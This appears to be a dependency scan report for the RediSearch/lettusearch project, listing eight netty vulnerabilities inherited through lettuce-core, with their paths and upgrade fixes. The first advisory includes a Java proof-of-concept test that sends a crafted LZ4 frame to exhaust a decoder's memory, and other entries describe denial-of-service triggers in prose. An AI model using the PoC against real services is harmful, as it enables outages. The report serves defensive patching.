Vulnerabilities

8 via 50 paths

Dependencies

13

Source

GitHub

Find, fix and prevent vulnerabilities in your code.

Severity
  • 4
  • 4
Status
  • 8
  • 0
  • 0

high severity
new

Allocation of Resources Without Limits or Throttling

  • Vulnerable module: io.netty:netty-codec
  • Introduced through: io.lettuce:lettuce-core@6.1.0.RELEASE

Detailed paths

  • Introduced through: RediSearch/lettusearch@RediSearch/lettusearch io.lettuce:lettuce-core@6.1.0.RELEASE io.netty:netty-handler@4.1.60.Final io.netty:netty-codec@4.1.60.Final

Overview

io.netty:netty-codec is an event-driven asynchronous network application framework.

Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling in the Lz4FrameDecoder component. An attacker can cause excessive memory allocation by sending specially crafted compressed data with manipulated header fields, leading to resource exhaustion and potential denial of service.

PoC

    @Test
    void test() throws Exception {
        EventLoopGroup workerGroup = new MultiThreadIoEventLoopGroup(NioIoHandler.newFactory());
        try {
            AtomicReference<Throwable> serverError = new AtomicReference<>();
            CountDownLatch latch = new CountDownLatch(1);

            ServerBootstrap server = new ServerBootstrap()
                    .group(workerGroup)
                    .channel(NioServerSocketChannel.class)
                    .childHandler(new ChannelInitializer<SocketChannel>() {
                        @Override
                        protected void initChannel(SocketChannel ch) {
                            ch.pipeline()
                                    .addLast(new Lz4FrameDecoder())
                                    .addLast(new ChannelInboundHandlerAdapter() {
                                        @Override
                                        public void exceptionCaught(ChannelHandlerContext ctx, Throwable cause) {
                                            if (cause instanceof DecoderException) {
                                                serverError.set(cause.getCause());
                                            } else {
                                                serverError.set(cause);
                                            }
                                            latch.countDown();
                                        }
                                    });
                        }
                    });

            ChannelFuture serverChannel = server.bind(0).sync();

            Bootstrap client = new Bootstrap()
                    .group(workerGroup)
                    .channel(NioSocketChannel.class)
                    .handler(new ChannelInboundHandlerAdapter() {
                        @Override
                        public void channelActive(ChannelHandlerContext ctx) {
                            ByteBuf buf = ctx.alloc().buffer(22, 22);
                            buf.writeLong(MAGIC_NUMBER);
                            buf.writeByte(BLOCK_TYPE_COMPRESSED | 0x0F);
                            buf.writeIntLE(1);
                            buf.writeIntLE(1 << 25);
                            buf.writeIntLE(0);
                            buf.writeByte(0);

                            ctx.writeAndFlush(buf);

                            ctx.fireChannelActive();
                        }
                    });

            ChannelFuture clientChannel = client.connect(serverChannel.channel().localAddress()).sync();

            assertTrue(latch.await(10, TimeUnit.SECONDS));

            assertInstanceOf(IndexOutOfBoundsException.class, serverError.get());

            clientChannel.channel().close();
            serverChannel.channel().close();
        } finally {
            workerGroup.shutdownGracefully();
        }
    }

Remediation

Upgrade io.netty:netty-codec to version 4.1.133.Final or higher.

References

high severity
new

Improper Handling of Highly Compressed Data (Data Amplification)

  • Vulnerable module: io.netty:netty-codec
  • Introduced through: io.lettuce:lettuce-core@6.1.0.RELEASE

Detailed paths

  • Introduced through: RediSearch/lettusearch@RediSearch/lettusearch io.lettuce:lettuce-core@6.1.0.RELEASE io.netty:netty-handler@4.1.60.Final io.netty:netty-codec@4.1.60.Final

Overview

io.netty:netty-codec is an event-driven asynchronous network application framework.

Affected versions of this package are vulnerable to Improper Handling of Highly Compressed Data (Data Amplification) in the HttpContentDecompressor and DelegatingDecompressorFrameListener components when the Content-Encoding header is set to br, zstd, or snappy. An attacker can exhaust system memory and cause a denial of service by sending a highly compressed payload that decompresses to a very large size, bypassing the configured decompression limit.

Remediation

Upgrade io.netty:netty-codec to version 4.1.133.Final or higher.

References

high severity

Denial of Service (DoS)

  • Vulnerable module: io.netty:netty-codec
  • Introduced through: io.lettuce:lettuce-core@6.1.0.RELEASE

Detailed paths

  • Introduced through: RediSearch/lettusearch@RediSearch/lettusearch io.lettuce:lettuce-core@6.1.0.RELEASE io.netty:netty-handler@4.1.60.Final io.netty:netty-codec@4.1.60.Final
    Remediation: Upgrade to io.lettuce:lettuce-core@6.1.5.RELEASE.

Overview

io.netty:netty-codec is an event-driven asynchronous network application framework.

Affected versions of this package are vulnerable to Denial of Service (DoS). SnappyFrameDecoder doesn't restrict chunk length any mad buffer skippable chunks in an unnecessary way, leading to excessive memory usage. This vulnerability can be triggered by supplying malicious input that decompresses to a very big size (via a network stream or a file), or by sending a huge skippable chunk.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.

When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.

Two common types of DoS vulnerabilities:

  • High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.

  • Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

Remediation

Upgrade io.netty:netty-codec to version 4.1.68.Final or higher.

References

high severity

Denial of Service (DoS)

  • Vulnerable module: io.netty:netty-codec
  • Introduced through: io.lettuce:lettuce-core@6.1.0.RELEASE

Detailed paths

  • Introduced through: RediSearch/lettusearch@RediSearch/lettusearch io.lettuce:lettuce-core@6.1.0.RELEASE io.netty:netty-handler@4.1.60.Final io.netty:netty-codec@4.1.60.Final
    Remediation: Upgrade to io.lettuce:lettuce-core@6.1.5.RELEASE.

Overview

io.netty:netty-codec is an event-driven asynchronous network application framework.

Affected versions of this package are vulnerable to Denial of Service (DoS). Bzip2Decoder doesn't allow setting size restrictions for decompressed data. An attacker can exploit this by providing a compressed file that, when decompressed, triggers an out-of-memory exception.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.

When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.

Two common types of DoS vulnerabilities:

  • High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.

  • Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

Remediation

Upgrade io.netty:netty-codec to version 4.1.68.Final or higher.

References

medium severity

Denial of Service (DoS)

  • Vulnerable module: io.netty:netty-common
  • Introduced through: io.lettuce:lettuce-core@6.1.0.RELEASE

Detailed paths

  • Introduced through: RediSearch/lettusearch@RediSearch/lettusearch io.lettuce:lettuce-core@6.1.0.RELEASE io.netty:netty-common@4.1.60.Final
    Remediation: Upgrade to io.lettuce:lettuce-core@6.5.1.RELEASE.
  • Introduced through: RediSearch/lettusearch@RediSearch/lettusearch io.lettuce:lettuce-core@6.1.0.RELEASE io.netty:netty-transport@4.1.60.Final io.netty:netty-common@4.1.60.Final
    Remediation: Upgrade to io.lettuce:lettuce-core@6.5.1.RELEASE.
  • Introduced through: RediSearch/lettusearch@RediSearch/lettusearch io.lettuce:lettuce-core@6.1.0.RELEASE io.netty:netty-handler@4.1.60.Final io.netty:netty-common@4.1.60.Final
    Remediation: Upgrade to io.lettuce:lettuce-core@6.5.1.RELEASE.
  • Introduced through: RediSearch/lettusearch@RediSearch/lettusearch io.lettuce:lettuce-core@6.1.0.RELEASE io.netty:netty-transport@4.1.60.Final io.netty:netty-buffer@4.1.60.Final io.netty:netty-common@4.1.60.Final
    Remediation: Upgrade to io.lettuce:lettuce-core@6.5.1.RELEASE.
  • Introduced through: RediSearch/lettusearch@RediSearch/lettusearch io.lettuce:lettuce-core@6.1.0.RELEASE io.netty:netty-handler@4.1.60.Final io.netty:netty-buffer@4.1.60.Final io.netty:netty-common@4.1.60.Final
    Remediation: Upgrade to io.lettuce:lettuce-core@6.5.1.RELEASE.
  • Introduced through: RediSearch/lettusearch@RediSearch/lettusearch io.lettuce:lettuce-core@6.1.0.RELEASE io.netty:netty-transport@4.1.60.Final io.netty:netty-resolver@4.1.60.Final io.netty:netty-common@4.1.60.Final
    Remediation: Upgrade to io.lettuce:lettuce-core@6.5.1.RELEASE.
  • Introduced through: RediSearch/lettusearch@RediSearch/lettusearch io.lettuce:lettuce-core@6.1.0.RELEASE io.netty:netty-handler@4.1.60.Final io.netty:netty-resolver@4.1.60.Final io.netty:netty-common@4.1.60.Final
    Remediation: Upgrade to io.lettuce:lettuce-core@6.5.1.RELEASE.
  • Introduced through: RediSearch/lettusearch@RediSearch/lettusearch io.lettuce:lettuce-core@6.1.0.RELEASE io.netty:netty-handler@4.1.60.Final io.netty:netty-transport@4.1.60.Final io.netty:netty-common@4.1.60.Final
    Remediation: Upgrade to io.lettuce:lettuce-core@6.5.1.RELEASE.
  • Introduced through: RediSearch/lettusearch@RediSearch/lettusearch io.lettuce:lettuce-core@6.1.0.RELEASE io.netty:netty-handler@4.1.60.Final io.netty:netty-codec@4.1.60.Final io.netty:netty-common@4.1.60.Final
    Remediation: Upgrade to io.lettuce:lettuce-core@6.5.1.RELEASE.
  • Introduced through: RediSearch/lettusearch@RediSearch/lettusearch io.lettuce:lettuce-core@6.1.0.RELEASE io.netty:netty-handler@4.1.60.Final io.netty:netty-transport@4.1.60.Final io.netty:netty-buffer@4.1.60.Final io.netty:netty-common@4.1.60.Final
    Remediation: Upgrade to io.lettuce:lettuce-core@6.5.1.RELEASE.
  • Introduced through: RediSearch/lettusearch@RediSearch/lettusearch io.lettuce:lettuce-core@6.1.0.RELEASE io.netty:netty-handler@4.1.60.Final io.netty:netty-codec@4.1.60.Final io.netty:netty-buffer@4.1.60.Final io.netty:netty-common@4.1.60.Final
    Remediation: Upgrade to io.lettuce:lettuce-core@6.5.1.RELEASE.
  • Introduced through: RediSearch/lettusearch@RediSearch/lettusearch io.lettuce:lettuce-core@6.1.0.RELEASE io.netty:netty-handler@4.1.60.Final io.netty:netty-transport@4.1.60.Final io.netty:netty-resolver@4.1.60.Final io.netty:netty-common@4.1.60.Final
    Remediation: Upgrade to io.lettuce:lettuce-core@6.5.1.RELEASE.
  • Introduced through: RediSearch/lettusearch@RediSearch/lettusearch io.lettuce:lettuce-core@6.1.0.RELEASE io.netty:netty-handler@4.1.60.Final io.netty:netty-codec@4.1.60.Final io.netty:netty-transport@4.1.60.Final io.netty:netty-common@4.1.60.Final
    Remediation: Upgrade to io.lettuce:lettuce-core@6.5.1.RELEASE.
  • Introduced through: RediSearch/lettusearch@RediSearch/lettusearch io.lettuce:lettuce-core@6.1.0.RELEASE io.netty:netty-handler@4.1.60.Final io.netty:netty-codec@4.1.60.Final io.netty:netty-transport@4.1.60.Final io.netty:netty-buffer@4.1.60.Final io.netty:netty-common@4.1.60.Final
    Remediation: Upgrade to io.lettuce:lettuce-core@6.5.1.RELEASE.
  • Introduced through: RediSearch/lettusearch@RediSearch/lettusearch io.lettuce:lettuce-core@6.1.0.RELEASE io.netty:netty-handler@4.1.60.Final io.netty:netty-codec@4.1.60.Final io.netty:netty-transport@4.1.60.Final io.netty:netty-resolver@4.1.60.Final io.netty:netty-common@4.1.60.Final
    Remediation: Upgrade to io.lettuce:lettuce-core@6.5.1.RELEASE.

Overview

Affected versions of this package are vulnerable to Denial of Service (DoS) due to the extraneous reading of a Linux environment file when loaded on a Windows application. An attacker can cause the application to crash by creating a large file in C:\etc\os-release or C:\usr\lib\os-release which the application attempts to load. If the file exceeds the JVM's memory limit (1 GB by default) the application will crash when loading it into memory.

Note: This vulnerability affects only Windows environments.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.

When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.

Two common types of DoS vulnerabilities:

  • High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.

  • Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

Remediation

Upgrade io.netty:netty-common to version 4.1.115.Final or higher.

References

medium severity

Improper Validation of Specified Quantity in Input

  • Vulnerable module: io.netty:netty-common
  • Introduced through: io.lettuce:lettuce-core@6.1.0.RELEASE

Detailed paths

  • Introduced through: RediSearch/lettusearch@RediSearch/lettusearch io.lettuce:lettuce-core@6.1.0.RELEASE io.netty:netty-common@4.1.60.Final
    Remediation: Upgrade to io.lettuce:lettuce-core@6.5.4.RELEASE.
  • Introduced through: RediSearch/lettusearch@RediSearch/lettusearch io.lettuce:lettuce-core@6.1.0.RELEASE io.netty:netty-transport@4.1.60.Final io.netty:netty-common@4.1.60.Final
    Remediation: Upgrade to io.lettuce:lettuce-core@6.5.4.RELEASE.
  • Introduced through: RediSearch/lettusearch@RediSearch/lettusearch io.lettuce:lettuce-core@6.1.0.RELEASE io.netty:netty-handler@4.1.60.Final io.netty:netty-common@4.1.60.Final
    Remediation: Upgrade to io.lettuce:lettuce-core@6.5.4.RELEASE.
  • Introduced through: RediSearch/lettusearch@RediSearch/lettusearch io.lettuce:lettuce-core@6.1.0.RELEASE io.netty:netty-transport@4.1.60.Final io.netty:netty-buffer@4.1.60.Final io.netty:netty-common@4.1.60.Final
    Remediation: Upgrade to io.lettuce:lettuce-core@6.5.4.RELEASE.
  • Introduced through: RediSearch/lettusearch@RediSearch/lettusearch io.lettuce:lettuce-core@6.1.0.RELEASE io.netty:netty-handler@4.1.60.Final io.netty:netty-buffer@4.1.60.Final io.netty:netty-common@4.1.60.Final
    Remediation: Upgrade to io.lettuce:lettuce-core@6.5.4.RELEASE.
  • Introduced through: RediSearch/lettusearch@RediSearch/lettusearch io.lettuce:lettuce-core@6.1.0.RELEASE io.netty:netty-transport@4.1.60.Final io.netty:netty-resolver@4.1.60.Final io.netty:netty-common@4.1.60.Final
    Remediation: Upgrade to io.lettuce:lettuce-core@6.5.4.RELEASE.
  • Introduced through: RediSearch/lettusearch@RediSearch/lettusearch io.lettuce:lettuce-core@6.1.0.RELEASE io.netty:netty-handler@4.1.60.Final io.netty:netty-resolver@4.1.60.Final io.netty:netty-common@4.1.60.Final
    Remediation: Upgrade to io.lettuce:lettuce-core@6.5.4.RELEASE.
  • Introduced through: RediSearch/lettusearch@RediSearch/lettusearch io.lettuce:lettuce-core@6.1.0.RELEASE io.netty:netty-handler@4.1.60.Final io.netty:netty-transport@4.1.60.Final io.netty:netty-common@4.1.60.Final
    Remediation: Upgrade to io.lettuce:lettuce-core@6.5.4.RELEASE.
  • Introduced through: RediSearch/lettusearch@RediSearch/lettusearch io.lettuce:lettuce-core@6.1.0.RELEASE io.netty:netty-handler@4.1.60.Final io.netty:netty-codec@4.1.60.Final io.netty:netty-common@4.1.60.Final
    Remediation: Upgrade to io.lettuce:lettuce-core@6.5.4.RELEASE.
  • Introduced through: RediSearch/lettusearch@RediSearch/lettusearch io.lettuce:lettuce-core@6.1.0.RELEASE io.netty:netty-handler@4.1.60.Final io.netty:netty-transport@4.1.60.Final io.netty:netty-buffer@4.1.60.Final io.netty:netty-common@4.1.60.Final
    Remediation: Upgrade to io.lettuce:lettuce-core@6.5.4.RELEASE.
  • Introduced through: RediSearch/lettusearch@RediSearch/lettusearch io.lettuce:lettuce-core@6.1.0.RELEASE io.netty:netty-handler@4.1.60.Final io.netty:netty-codec@4.1.60.Final io.netty:netty-buffer@4.1.60.Final io.netty:netty-common@4.1.60.Final
    Remediation: Upgrade to io.lettuce:lettuce-core@6.5.4.RELEASE.
  • Introduced through: RediSearch/lettusearch@RediSearch/lettusearch io.lettuce:lettuce-core@6.1.0.RELEASE io.netty:netty-handler@4.1.60.Final io.netty:netty-transport@4.1.60.Final io.netty:netty-resolver@4.1.60.Final io.netty:netty-common@4.1.60.Final
    Remediation: Upgrade to io.lettuce:lettuce-core@6.5.4.RELEASE.
  • Introduced through: RediSearch/lettusearch@RediSearch/lettusearch io.lettuce:lettuce-core@6.1.0.RELEASE io.netty:netty-handler@4.1.60.Final io.netty:netty-codec@4.1.60.Final io.netty:netty-transport@4.1.60.Final io.netty:netty-common@4.1.60.Final
    Remediation: Upgrade to io.lettuce:lettuce-core@6.5.4.RELEASE.
  • Introduced through: RediSearch/lettusearch@RediSearch/lettusearch io.lettuce:lettuce-core@6.1.0.RELEASE io.netty:netty-handler@4.1.60.Final io.netty:netty-codec@4.1.60.Final io.netty:netty-transport@4.1.60.Final io.netty:netty-buffer@4.1.60.Final io.netty:netty-common@4.1.60.Final
    Remediation: Upgrade to io.lettuce:lettuce-core@6.5.4.RELEASE.
  • Introduced through: RediSearch/lettusearch@RediSearch/lettusearch io.lettuce:lettuce-core@6.1.0.RELEASE io.netty:netty-handler@4.1.60.Final io.netty:netty-codec@4.1.60.Final io.netty:netty-transport@4.1.60.Final io.netty:netty-resolver@4.1.60.Final io.netty:netty-common@4.1.60.Final
    Remediation: Upgrade to io.lettuce:lettuce-core@6.5.4.RELEASE.

Overview

Affected versions of this package are vulnerable to Improper Validation of Specified Quantity in Input in BufferedReader.readLine(), which does not count null bytes when calculating the acceptable size of an input stream. An attacker can cause the application to crash by creating a large file in C:\etc\os-release or C:\usr\lib\os-release which the application attempts to load. If the file exceeds the JVM's memory limit (1 GB by default) the application will crash when loading it into memory.

Note: This vulnerability affects only Windows environments and is a bypass for the previously reported and fixed CVE-2024-47535.

Remediation

Upgrade io.netty:netty-common to version 4.1.118, 4.2.0.RC3 or higher.

References

medium severity

Denial of Service (DoS)

  • Vulnerable module: io.netty:netty-handler
  • Introduced through: io.lettuce:lettuce-core@6.1.0.RELEASE

Detailed paths

  • Introduced through: RediSearch/lettusearch@RediSearch/lettusearch io.lettuce:lettuce-core@6.1.0.RELEASE io.netty:netty-handler@4.1.60.Final
    Remediation: Upgrade to io.lettuce:lettuce-core@6.2.5.RELEASE.

Overview

io.netty:netty-handler is a library that provides an asynchronous event-driven network application framework and tools for rapid development of maintainable high performance and high scalability protocol servers and clients. In other words, Netty is a NIO client server framework which enables quick and easy development of network applications such as protocol servers and clients. It greatly simplifies and streamlines network programming such as TCP and UDP socket server.

Affected versions of this package are vulnerable to Denial of Service (DoS) such that if the user has no idle timeout handler configured it might be possible for a remote peer to send a client hello packet which leads the server to buffer up to 16MB of data per connection.

The SniHandler class is a handler that waits for the TLS handshake to configure a SslHandler according to the indicated server name by the ClientHello record. For this matter it allocates a ByteBuf using the value defined in the ClientHello record.

Note:

An attacker can craft a packet that makes the SslClientHelloHandler to:

  1. Allocate a 16MB ByteBuf.

  2. Not fail decode method in buffer.

  3. Get out of the loop without an exception.

The combination of this without the use of a timeout makes it easy to connect to a TCP server and allocate 16MB of heap memory per connection.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.

When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.

Two common types of DoS vulnerabilities:

  • High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.

  • Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

Remediation

Upgrade io.netty:netty-handler to version 4.1.94.Final or higher.

References

medium severity

Information Exposure

  • Vulnerable module: io.netty:netty-common
  • Introduced through: io.lettuce:lettuce-core@6.1.0.RELEASE

Detailed paths

  • Introduced through: RediSearch/lettusearch@RediSearch/lettusearch io.lettuce:lettuce-core@6.1.0.RELEASE io.netty:netty-common@4.1.60.Final
    Remediation: Upgrade to io.lettuce:lettuce-core@6.1.9.RELEASE.
  • Introduced through: RediSearch/lettusearch@RediSearch/lettusearch io.lettuce:lettuce-core@6.1.0.RELEASE io.netty:netty-transport@4.1.60.Final io.netty:netty-common@4.1.60.Final
    Remediation: Upgrade to io.lettuce:lettuce-core@6.1.9.RELEASE.
  • Introduced through: RediSearch/lettusearch@RediSearch/lettusearch io.lettuce:lettuce-core@6.1.0.RELEASE io.netty:netty-handler@4.1.60.Final io.netty:netty-common@4.1.60.Final
    Remediation: Upgrade to io.lettuce:lettuce-core@6.1.9.RELEASE.
  • Introduced through: RediSearch/lettusearch@RediSearch/lettusearch io.lettuce:lettuce-core@6.1.0.RELEASE io.netty:netty-transport@4.1.60.Final io.netty:netty-buffer@4.1.60.Final io.netty:netty-common@4.1.60.Final
    Remediation: Upgrade to io.lettuce:lettuce-core@6.1.9.RELEASE.
  • Introduced through: RediSearch/lettusearch@RediSearch/lettusearch io.lettuce:lettuce-core@6.1.0.RELEASE io.netty:netty-handler@4.1.60.Final io.netty:netty-buffer@4.1.60.Final io.netty:netty-common@4.1.60.Final
    Remediation: Upgrade to io.lettuce:lettuce-core@6.1.9.RELEASE.
  • Introduced through: RediSearch/lettusearch@RediSearch/lettusearch io.lettuce:lettuce-core@6.1.0.RELEASE io.netty:netty-transport@4.1.60.Final io.netty:netty-resolver@4.1.60.Final io.netty:netty-common@4.1.60.Final
    Remediation: Upgrade to io.lettuce:lettuce-core@6.1.9.RELEASE.
  • Introduced through: RediSearch/lettusearch@RediSearch/lettusearch io.lettuce:lettuce-core@6.1.0.RELEASE io.netty:netty-handler@4.1.60.Final io.netty:netty-resolver@4.1.60.Final io.netty:netty-common@4.1.60.Final
    Remediation: Upgrade to io.lettuce:lettuce-core@6.1.9.RELEASE.
  • Introduced through: RediSearch/lettusearch@RediSearch/lettusearch io.lettuce:lettuce-core@6.1.0.RELEASE io.netty:netty-handler@4.1.60.Final io.netty:netty-transport@4.1.60.Final io.netty:netty-common@4.1.60.Final
    Remediation: Upgrade to io.lettuce:lettuce-core@6.1.9.RELEASE.
  • Introduced through: RediSearch/lettusearch@RediSearch/lettusearch io.lettuce:lettuce-core@6.1.0.RELEASE io.netty:netty-handler@4.1.60.Final io.netty:netty-codec@4.1.60.Final io.netty:netty-common@4.1.60.Final
    Remediation: Upgrade to io.lettuce:lettuce-core@6.1.9.RELEASE.
  • Introduced through: RediSearch/lettusearch@RediSearch/lettusearch io.lettuce:lettuce-core@6.1.0.RELEASE io.netty:netty-handler@4.1.60.Final io.netty:netty-transport@4.1.60.Final io.netty:netty-buffer@4.1.60.Final io.netty:netty-common@4.1.60.Final
    Remediation: Upgrade to io.lettuce:lettuce-core@6.1.9.RELEASE.
  • Introduced through: RediSearch/lettusearch@RediSearch/lettusearch io.lettuce:lettuce-core@6.1.0.RELEASE io.netty:netty-handler@4.1.60.Final io.netty:netty-codec@4.1.60.Final io.netty:netty-buffer@4.1.60.Final io.netty:netty-common@4.1.60.Final
    Remediation: Upgrade to io.lettuce:lettuce-core@6.1.9.RELEASE.
  • Introduced through: RediSearch/lettusearch@RediSearch/lettusearch io.lettuce:lettuce-core@6.1.0.RELEASE io.netty:netty-handler@4.1.60.Final io.netty:netty-transport@4.1.60.Final io.netty:netty-resolver@4.1.60.Final io.netty:netty-common@4.1.60.Final
    Remediation: Upgrade to io.lettuce:lettuce-core@6.1.9.RELEASE.
  • Introduced through: RediSearch/lettusearch@RediSearch/lettusearch io.lettuce:lettuce-core@6.1.0.RELEASE io.netty:netty-handler@4.1.60.Final io.netty:netty-codec@4.1.60.Final io.netty:netty-transport@4.1.60.Final io.netty:netty-common@4.1.60.Final
    Remediation: Upgrade to io.lettuce:lettuce-core@6.1.9.RELEASE.
  • Introduced through: RediSearch/lettusearch@RediSearch/lettusearch io.lettuce:lettuce-core@6.1.0.RELEASE io.netty:netty-handler@4.1.60.Final io.netty:netty-codec@4.1.60.Final io.netty:netty-transport@4.1.60.Final io.netty:netty-buffer@4.1.60.Final io.netty:netty-common@4.1.60.Final
    Remediation: Upgrade to io.lettuce:lettuce-core@6.1.9.RELEASE.
  • Introduced through: RediSearch/lettusearch@RediSearch/lettusearch io.lettuce:lettuce-core@6.1.0.RELEASE io.netty:netty-handler@4.1.60.Final io.netty:netty-codec@4.1.60.Final io.netty:netty-transport@4.1.60.Final io.netty:netty-resolver@4.1.60.Final io.netty:netty-common@4.1.60.Final
    Remediation: Upgrade to io.lettuce:lettuce-core@6.1.9.RELEASE.

Overview

Affected versions of this package are vulnerable to Information Exposure due to an incomplete fix to CVE-2021-21290, which still allowed one exploitable path. When netty's multipart decoders are used, local information disclosure can occur via the local system temporary directory, if temporary storing uploads on the disk is enabled. Note: To be vulnerable, a victim application has to run on a Unix-like operating system, and with Java 6 or below.

Remediation

Upgrade io.netty:netty-common to version 4.1.77.Final or higher.

References